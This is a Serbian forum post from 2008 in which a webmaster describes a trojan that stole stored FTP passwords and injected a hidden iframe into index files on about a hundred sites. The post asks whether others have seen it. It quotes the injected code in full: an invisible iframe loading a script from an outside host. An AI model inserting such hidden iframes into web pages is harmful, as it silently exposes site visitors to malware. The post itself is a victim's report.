Pogledajte određenu poruku
Staro 09. 04. 2008.   #1
ppavlovic
expert
Expert
 
Avatar ppavlovic
 
Datum učlanjenja: 27.11.2005
Poruke: 543
Hvala: 47
57 "Hvala" u 31 poruka
ppavlovic će postati "faca" uskoro
Red face "Rasturio" me virus / trojanac

Ne bih zeleo da se ovo nekom desi. :-(

Nekako sam zapatio trojanca koji ima tu osobinu da skupi FTP sifre koje su snimljene u nekom od FTP programa (u mom slucaju, radi se o Total Commanderu) i salje ih na neki udaljeni (zarazeni) racunar. U mom slucaju, to je jedno 100-tinak sajtova. :-(

Dalje, udaljeni racunar se kaci na FTP i preuzima fajlove koji imaju index u svom nazivu, bez obzira na ekstenziju. Lokalno na racunaru menja sadrzaj fajlova i na dnu dodaje
Kôd:
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Ponekad stavlja komentar na postojece iframe tagove u tim fajlovima.
Posle toga uredno uploaduje taj fajl na FTP.
Ponekad se desi da ostavi fajl main.php koji je "klasicna" skripta za remote upravljanje sajtom.

Glavni problem je sto ovaj trojanac "ne radi" sve kako treba, tako da se desi da uploaduje isecen fajl ili da u potpunosti prepise sadrzaj *index*.* fajlova iframe kodom. A desilo se da se html fajl od jednog klijenta preseli kod drugog.

Da li se neko sretao sa necim slicnim?
__________________
MojNoviAuto.com - Tvoj prvi sajt za kupovinu novog automobila
ppavlovic je offline   Odgovorite uz citat